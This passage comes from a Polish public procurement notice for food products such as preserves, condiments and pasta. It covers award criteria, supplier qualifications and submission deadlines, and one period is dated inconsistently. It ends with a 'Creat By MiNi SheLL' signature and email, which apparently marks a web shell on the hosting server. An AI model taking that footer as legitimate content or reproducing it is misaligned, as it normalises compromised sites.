(opakowanie 10ml)	szt	35<br/>Chrzan tarty (opakowanie od 180 do 200g)	szt	145<br/>Dżem (opakowanie od 260 do 300g) owoce min. 30g w 100g produktu	szt	500<br/>Groszek zielony, konserwowy (opakowanie 400g) nie suszony	szt	1800<br/>Kompot wiśnia (opakowanie 0,9 l) masa owoców po odcieku min. 200g	szt	300<br/>Kompot czarna porzeczka (opakowanie 0,9 l) masa owoców po odcieku min. 250g	szt	300<br/>Koncentrat pomidorowy, pasta pomidorowa (opakowanie 190g) bez dodatku wody, bez konserwantów, KOTLIN lub PUDLISZKI 30%, 1,1 kg pomidorów na opakowanie lub równoważny* szt	40<br/>Koncentrat pomidorowy, pasta pomidorowa (opakowanie 990g) bez dodatku wody, bez konserwantów, KOTLIN lub PUDLISZKI 30%, 5,9 kg pomidorów na opakowanie lub równoważny* szt	360<br/>Ketchup (opakowanie 500g)	szt	60<br/>Kukurydza konserwowa (opakowanie 400g)	szt	300<br/>Majonez dekoracyjny (opakowanie 400 ml)	szt	550<br/>Marmolada wieloowocowa (opakowanie 600g), twarda	szt	150<br/>Miód pszczeli (opakowanie 25g) w pudełkach nie w saszetkach	szt	3500<br/>Musztarda (opakowanie od 180 do 220g)	szt	960<br/>Ocet (opakowanie 0,5 l)	l	72<br/>Olej (opakowanie 1 l)	l	520<br/>Ogórek konserwowy (opakowanie 900 ml)	szt	650<br/>Pasztet drobiowy PROFI Wielkopolski (opakowanie 131g) bez dodatków, skład: mięso drobiowe- 14%, wątroba z kurcząt-3%, wątroba wieprzowa, jajka, kasza manna lub równoważny*	szt	2000<br/>Papryka konserwowa (opakowanie 900ml)	szt	75<br/>Powidła śliwkowe (opakowanie 300g)	szt	330<br/>Przyprawa w płynie do zup, sosów, potraw mięsnych i warzywnych (opakowanie 0,96 l) składniki: woda, sól, wzmacniacze smaku (glutaminian monosodowy, E635), ocet, glukoza, ekstrakt drożdżowy, aromat. Szklana ciemna butelka	szt	205<br/>Sok owocowy bez cukru (opakowanie 200ml)	szt	150<br/>Sok przecierowy marchwiowo-owocowy (opakowanie od 300 do 330ml) bez cukru typu Kubuś	szt	50<br/>Sos tatarski (opakowanie 250g)	szt	24<br/>Wiśnie drylowane (słoik 720ml)	szt	22 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 27182,56 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03222115-2 - Rodzynki</p> <p class="mb-0">15320000-7 - Soki owocowe i warzywne</p> <p class="mb-0">15330000-0 - Przetworzone owoce i warzywa</p> <p class="mb-0">15331425-2 - Przecier pomidorowy</p> <p class="mb-0">15332200-6 - Dżemy i marmolady, galaretki owocowe, przeciery z owoców i orzechów oraz pasty do smarowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami<br/>i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Waga (%)<br/>1) Cena (P1) 60 %<br/>2) Termin dostawy od złożenia zamówienia (P2) 40 %<br/>Razem (P) 100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej.<br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, wynosi 60,00 pkt.<br/><br/>Waga – 60%<br/> Najniższa cena pośród ofert nieodrzuconych<br/>Wartość punktowa P1 = -------------------------------------------------------- x 100 x waga<br/> Cena (brutto) badanej oferty<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone w kryterium otrzyma maksymalną ilość punktów. Pozostałym wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów.<br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Termin dostawy od złożenia zamówienia ” – (P2)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium,<br/>wynosi 40,00 pkt.<br/>Waga – 40%<br/>Dla kryterium „Termin dostawy od złożenia zamówienia” punkty zostaną przyznane w następujący sposób:<br/>a) wykonawca, który zadeklaruje maksymalny czas dostarczenia zamówienia w terminie 3 dni otrzyma 20 pkt,<br/>b) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 2 dni otrzyma 30 pkt,<br/>c) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 1 dzień otrzyma 40 pkt,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostwy od złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Makaron muszelki 4 jajeczny	kg	35<br/>Makaron gwiazdki 4 jajeczny	kg	50<br/>Makaron kolanka 4 jajeczny	kg	200<br/>Makaron świderki 4 jajeczny	kg	460 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 8768,57 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami<br/>i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Waga (%)<br/>1) Cena (P1) 60 %<br/>2) Termin dostawy od złożenia zamówienia (P2) 40 %<br/>Razem (P) 100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej.<br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, wynosi 60,00 pkt.<br/><br/>Waga – 60%<br/> Najniższa cena pośród ofert nieodrzuconych<br/>Wartość punktowa P1 = -------------------------------------------------------- x 100 x waga<br/> Cena (brutto) badanej oferty<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone w kryterium otrzyma maksymalną ilość punktów. Pozostałym wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów.<br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Termin dostawy od złożenia zamówienia ” – (P2)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium,<br/>wynosi 40,00 pkt.<br/>Waga – 40%<br/>Dla kryterium „Termin dostawy od złożenia zamówienia” punkty zostaną przyznane w następujący sposób:<br/>a) wykonawca, który zadeklaruje maksymalny czas dostarczenia zamówienia w terminie 3 dni otrzyma 20 pkt,<br/>b) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 2 dni otrzyma 30 pkt,<br/>c) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 1 dzień otrzyma 40 pkt,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostwy od złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w postępowaniu<br/>dotyczący/-e:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>nie dotyczy<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów:<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca udokumentuje że:<br/>Wykonawca jako podmiot działający na rynku spożywczym lub na rynku <br/>materiałów i wyrobów przeznaczonych do kontaktu z żywnością musi posiadać <br/>wpis do rejestru zakładów albo o zatwierdzenie zakładu i o wpis do rejestru <br/>zakładów, zgodnie z art. 64 ust. 1 ustawy z dnia 25 sierpnia 2006 r. <br/>o bezpieczeństwie żywności i żywienia (tj. Dz. U. 2022 poz. 2132). <br/><br/>3) sytuacji ekonomicznej lub finansowej:<br/>nie dotyczy<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca udokumentuje że:<br/>a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy– w tym okresie, wykonał minimum jedną dostawę różnych artykułów spożywczych dotyczących ww. zamówienia, obejmujących m.in.: artykuły sypkie, przetwory, przyprawy, makarony, jajka itp, o wartości nie mniejszej niż 30.000,00 zł brutto. zgodnie z załącznikiem nr 11 do SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/> przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 <br/> lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z <br/> innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o <br/> dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do <br/> tej samej grupy kapitałowej wraz z dokumentami lub informacjami <br/> potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o <br/> dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy <br/> należącego do tej samej grupy kapitałowej – załącznik nr 9 do SWZ; <br/>b) Wpis do rejestru zakładów albo o zatwierdzenie zakładu i o wpis do rejestru <br/> zakładów, zgodnie z art. 64 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o <br/> bezpieczeństwie żywności i żywienia (tj. Dz. U. 2022 poz. 2132). <br/>c) Oświadczenie Wykonawcy o wdrożeniu i stosowaniu w zakładzie systemu <br/> HACCP. <br/>d) wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, z którego wynika, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum jedną dostawę różnych artykułów spożywczych dotyczących ww. zadania, obejmujących m.in.: artykuły sypkie, przetwory, przyprawy, makarony, jajka itp, o wartości nie mniejszej niż 30.000,00 zł brutto wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (zgodnie z załącznikiem nr 11 do SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/> przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 <br/> lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z <br/> innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o <br/> dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do <br/> tej samej grupy kapitałowej wraz z dokumentami lub informacjami <br/> potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o <br/> dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy <br/> należącego do tej samej grupy kapitałowej – załącznik nr 9 do SWZ; <br/>b) Wpis do rejestru zakładów albo o zatwierdzenie zakładu i o wpis do rejestru <br/> zakładów, zgodnie z art. 64 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o <br/> bezpieczeństwie żywności i żywienia (tj. Dz. U. 2022 poz. 2132). <br/>c) Oświadczenie Wykonawcy o wdrożeniu i stosowaniu w zakładzie systemu <br/> HACCP. <br/>d) wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, z którego wynika, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum jedną dostawę różnych artykułów spożywczych dotyczących ww. zadania, obejmujących m.in.: artykuły sypkie, przetwory, przyprawy, makarony, jajka itp, o wartości nie mniejszej niż 30.000,00 zł brutto wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (zgodnie z załącznikiem nr 11 do SWZ)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z postanowieniami SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 11 Projektu umowy stanowiącej załącznik nr 12 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-25 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/dpskombatant</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-25 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UWAGA!<br/>Brak wskazania w ofercie jakiegokolwiek czasu dostarczenia zamówienia, wskazanie innego czasu dostarczenia zamówienia niż 1,2 lub 3 dni uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę maksymalnego czasu dostarczenia zamówienia, tj. 3 dni.<br/>Kryterium czas dostarczenia zamówienia, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 1 Formularza ofertowego (załącznik nr 1 do SWZ).

Creat By MiNi SheLL
Email: jattceo@gmail.com